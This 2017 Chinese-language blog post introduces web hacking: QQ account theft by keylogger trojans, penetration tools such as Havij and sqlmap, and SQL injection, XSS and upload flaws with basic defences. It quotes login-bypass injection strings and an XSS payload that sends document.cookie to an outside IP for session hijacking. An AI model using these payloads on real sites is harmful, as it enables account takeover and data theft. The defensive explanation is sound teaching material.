“哇，做IT的”，羨慕驚訝臉。

“嗯嗯......”，點頭自豪臉。

“會不會盜QQ？......”，期待臉。

“......”，一臉懵逼。

首先聲明一下，不是所有的IT從業(yè)者都會盜QQ好么，IT領(lǐng)域那么廣，術(shù)業(yè)有專攻嘛。就算是hacker也有不同的方向的吶。

那還是先來簡單聊一聊怎么盜吧。盜QQ就是黑進(jìn)企鵝的數(shù)據(jù)庫然后查看密碼，游刃有余么？這未免想多了而且成本有點高。

條條道路通羅馬，盜QQ的手法很多種，我們先繞開釣魚頁面（一般做成中獎消息登錄窗口），仿造QQ登錄器（一般是網(wǎng)吧），破解QQ郵箱，密碼猜測等社工學(xué)手段，就hack而言，比較經(jīng)典的手法就是上木馬。方式之一是需要先把木馬上到你的機(jī)器上（通過你點擊的文件，鏈接或者網(wǎng)頁自動植入安裝，牛點的就直接攻電腦植入），注意這點很關(guān)鍵。當(dāng)你執(zhí)行登錄的時候記錄你的鍵盤密碼輸入按鍵行為，然后把密碼通過木馬程序發(fā)送到對方的指定位置（比如郵箱）。整個過程就是這么簡單，但指定QQ號不是今天說盜就能立馬盜的了的。

所以不明鏈接就別以為點下又不要錢就去瞎點了，還有特別是在網(wǎng)吧登QQ又不用軟鍵盤的你就等于是赤裸裸的在狂奔（當(dāng)然還有一種是直接檢測密碼記錄文件的，這種的就算使用軟鍵盤也是逃不過的）。

木馬程序哪里拿？怎么設(shè)置？自行搜索找資源了，我也沒有。^-^

聊完盜QQ我們進(jìn)入正題吧。閱讀以下內(nèi)容前默認(rèn)你已掌握一些基本的開發(fā)或者h(yuǎn)ack知識。

每一位hacker都不可能僅僅只會某一種攻擊技術(shù)。攻擊手段也多種多樣，諸如暴庫、弱口令攻擊、內(nèi)存溢出攻擊、注入、DDOS、XSS、旁注等等。不同目的使用不同的攻擊手法，就比如攻擊主機(jī)和web站點是有區(qū)別的。但是只要能達(dá)到目的用什么手段都行，你扛著大刀架到目標(biāo)管理員脖子上要到密碼都算你贏（這在網(wǎng)安上應(yīng)該屬于社工學(xué)）。

對于WEB站點滲透而言，通常情況攻擊流程為漏洞掃描，滲透，入侵，提權(quán)。當(dāng)然hack是一個無所不用其極的工種，隨機(jī)應(yīng)變，沒有固定公式可言。

先掃描站點漏洞，對掃描結(jié)果進(jìn)行滲透驗證是否確實存在漏洞，大多工具誤報率還是蠻高的，確認(rèn)漏洞后執(zhí)行自動攻擊或者手動攻擊，很多工具都支持自動攻擊，但是有些效果并沒有手動好，就比如Havij的SQL自動注入對SQL語句拼接都注不進(jìn)去，看著它能把你氣死。一般入侵后上傳木馬后門，拿webshell，提權(quán)，完事。

下面分享幾款WEB網(wǎng)站滲透工具供學(xué)習(xí)使用，有些是比較老了，有些是安全測試人員還在用，以下只分享使用心得，下載和教程有興趣的自行找資源哈，需要的可以交流。必須提醒的是，使用前切記請先隱藏好自己（不是躲草叢），弄好代理或跳板，啊，呸，是先閱讀好黑客精神和法則，以及遵守法律法規(guī)。

1.Safe3WVS

漏洞掃描工具，支持SQL注入，XSS跨站，上傳漏洞，潛在漏洞等的掃描，掃描效果還行。

免費未破解版的只能支持SQL注入漏洞掃描碼，存在誤報。需要自行驗證滲透。

上點圖搞點氣氛之Safe3WVS界面

2.Havij

是一款自動化的SQL注入工具,它能夠幫助滲透測試人員發(fā)現(xiàn)和利用Web應(yīng)用程序的SQL注入漏洞。

比如我們從上面的1軟件掃描到SQL注入漏洞，直接把地址抓過來，執(zhí)行自動注入，如果可注入成功底部將得到數(shù)據(jù)庫的賬號和基本信息。再進(jìn)一步可直接獲取表結(jié)構(gòu)，表字段，列值，一條龍入侵?jǐn)?shù)據(jù)庫，獲取管理員賬號迅速快捷。確實非常方便好用，但是有一個不足，上面說了，自動注入有時候連SQL語句拼接的漏洞都搞不定。

上點圖搞點氣氛之Havij界面

3.Sqlmap

SQL滲透工具，個人認(rèn)為最有效的工具。但是使用起來相對Havij來說不是很方便，非可視化操作，直接在cmd上干，敲命令操作。由python開發(fā)而成，安裝需先安裝python。

4.Fiddler

Fiddler是一個http協(xié)議調(diào)試代理工具，它能夠記錄并檢查所有你的電腦和互聯(lián)網(wǎng)之間的http通訊，設(shè)置斷點，查看所有的“進(jìn)出”Fiddler的數(shù)據(jù)（指cookie,html,js,css等文件，這些都可以讓你胡亂修改的意思）。

可以用來抓包（抓包還是挺好用的），數(shù)據(jù)攔截分析，偽造數(shù)據(jù)報等。

當(dāng)然它的附帶插件很多支持XSS漏洞掃描：

X5s，需手動訪問各個頁面forms表單，然后手動替換注入代碼驗證漏洞，不是很便捷，用起來累不死你。

Watcher，分析當(dāng)前URL包中存在安全漏洞問題，顯示嚴(yán)重等級，當(dāng)然也包含XSS漏洞。

ccXSScan，反射性XSS掃描，個人認(rèn)為沒什么效果的插件。

如果掃描到XSS漏洞直接可以payload，上傳代碼（一般利用的是存儲型XSS漏洞），可執(zhí)行自己定義的站外代碼，如果COOKIE的會話標(biāo)識未受保護(hù)，即可直接劫持，用于模擬用戶登錄（原理下文詳解）。

上點圖搞點氣氛之Fiddler界面

hack工具很多，以上就簡單介紹這么多吧。還有諸如著名的管理工具菜刀（必須要配合上傳的木馬使用，但用起來確實好用），DDOS工具LOIC（單部機(jī)器也只能算是個DOS），毀滅壓力測試終極版（這個倒是真沒有用過，看過一個視頻效果還行，不過據(jù)說收費版才有用），敏感地址和后臺地址掃描工具御劍（必須依賴字典庫，感覺就像密碼暴破的密碼庫一樣，關(guān)鍵在庫）等經(jīng)典工具就不多說了。你可能認(rèn)為HACK就是這么簡單，用幾個別人開發(fā)的工具點點就行了，那就有點尷尬了，這只能說就是平時所說的腳本小子。不建議只做腳本小子。

其實手注是一門更深的學(xué)問，才是內(nèi)功。

什么？上面那些都看不懂在干嘛？那簡單看看幾個原理吧。以下默認(rèn)你已掌握基本開發(fā)知識。

站在開發(fā)者的角度，對于WEB站點最通常也是最基本需要防御的安全漏洞：SQL注入，XSS，上傳漏洞，命令執(zhí)行注入，文件包含等等。

1.SQL注入

現(xiàn)在存在SQL注入漏洞的應(yīng)該比較少了吧，大多數(shù)是比較老的站點，過濾比較弱。但是你拿工具去掃描一些站點，還是會報一大堆漏洞地址的，當(dāng)然誤報率還是挺高的。如果不爽就直接用1'? or? 1=1或者'or'='or'等類似語句拼接一試便知。

曾經(jīng)就對某站點做了這樣一個測試（還沒開始嘗試滲透）：

上點圖搞點氣氛之注入登錄提交

輸入1'? or? 1=1為用戶名點擊登錄之后站點就崩潰了，懷疑是SQL語句拼接執(zhí)行了導(dǎo)致查詢?nèi)頂?shù)據(jù)資源耗盡導(dǎo)致，最近是加上了驗證碼（估計是以為被暴破了）。對輸入再次親測了下，數(shù)據(jù)也已經(jīng)作了過濾處理，站長的反應(yīng)還算蠻迅速的了。

原理大概就是，假如你寫了一段登錄判斷的用戶名密碼SQL查詢代碼如下：

$sql="select * from test where name='".$_GET['username']."'and password='".$_GET['password']."'";

正常執(zhí)行的語句是：

select * from test where name='lin'and password='123456';//查詢用戶名為lin密碼為123456的用戶。

如果注入成功，執(zhí)行的的是：

select * from test where name='1'or'1=1'and password='123456';//查詢用戶名為1或者密碼為123456的用戶。如果處理結(jié)果是取數(shù)據(jù)返回的第一條后果可想而知。非法登錄事小，聯(lián)表拿數(shù)據(jù)，獲取數(shù)據(jù)庫權(quán)限都只是時間問題。

注入后拿webshell最簡單流程：admin登錄，上馬，工具連接，拿到網(wǎng)站管理權(quán)限。

防御的手段基本就是，參數(shù)一定要過濾，轉(zhuǎn)義，永遠(yuǎn)不要相信用戶輸入，還有注意不要直接拼接SQL語句。現(xiàn)在這種漏洞很少了，就PHP而言其本身的自動轉(zhuǎn)義還有一些框架的過濾和轉(zhuǎn)義做得很便捷了直接設(shè)置參數(shù)即可了。但這并不意味著就無孔不入了，這只是基本的防線而已。

2.XSS

XSS反射型和存儲型，數(shù)存儲型比較好利用。只要無意點擊了事先植入的代碼就直接執(zhí)行了跨站代碼，任其魚肉，包括劫持COOKIE，模擬用戶登錄。其可以簡單理解為：假設(shè)你的站點有一個評論表單提交，存在XSS漏洞，攻擊者提交window.open('http://10.65.110.110/getcookie.php?msg='+document.cookie)代碼提交，之后只要任何用戶包括管理員訪問頁面點擊到了這塊隱藏代碼，直接會觸發(fā)請求http://10.65.110.110/getcookie.php?msg='+document.cookie，目標(biāo)頁面代碼對接收的cookie獲取并記錄，完美劫持COOKIE，并使用代理抓包中斷攔截，偽造cookie發(fā)送就可以無需密碼以被劫持的用戶身份登錄了。

大多數(shù)掃描工具只掃描反射型的，而且不是很好用。不過手動的話直接alert(123)一試便知。

最基本的防御就是過濾，編碼，PHP的htmlentities()函數(shù)html轉(zhuǎn)實體就很好用（入庫之前的處理），還要特別小心敏感標(biāo)簽和字符。還需要提的一點是COOKIE的會話標(biāo)識很多站點都不是httponly的，如果站點不存在XSS漏洞還好，如果存在的話那么這個直接就是COOKIE劫持的綠色通道呀，比較危險。

什么意思呢？趕緊打開你的站點看看吧，如果你的站點COOKIE的會話身份標(biāo)識PHPSESSID（PHP默認(rèn)的是這個，名字是可改的）不為httponly，那么恭喜你，只能提醒你小心草叢！

處理還是比較簡單的，如果是PHP語言可以配置文件配置下即可，其他的語言環(huán)境類似。

上點圖搞點氣氛之Firefox查看httponly

3.上傳漏洞

最簡單的就是上傳的文件判斷不夠嚴(yán)謹(jǐn)導(dǎo)致木馬進(jìn)入目錄，被執(zhí)行，整站淪陷。PHPCMS早期的上傳漏洞很經(jīng)典了。

基本防御的話就是充分驗證上傳文件的類型，上傳目錄不要給執(zhí)行權(quán)限。

還有DDOS攻擊防御雖然更傾向于運維，但個人覺得對于開發(fā)人員應(yīng)該也要懂得IPtables、負(fù)載均衡等這些最基本的防御降損策略吧。這種不講道理的粗暴群毆向來比較難防，要成本，如果真遇上了，還是多找找發(fā)起的根源吧。當(dāng)然，先不必驚慌，抑或可能也許是有新手正拿你的站點練手或者壓測呢。^_^

使用阿里云的同學(xué)，只能說其自動安全檢測很不錯了，但完全依賴似乎也不行，機(jī)械化并且誤報較高~^~。網(wǎng)安養(yǎng)兵千日用兵一時。就簡單聊到這吧，網(wǎng)安其實是一個甚深的無底洞，上文皮毛而已。分享是一種快樂，也希望對有需要的朋友能有所幫助。有需要給幫忙作安檢的站點也可以扔過來交流哈。

僅供用于技術(shù)學(xué)習(xí)，請遵循國家相關(guān)法律法規(guī)。

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 2017.7.1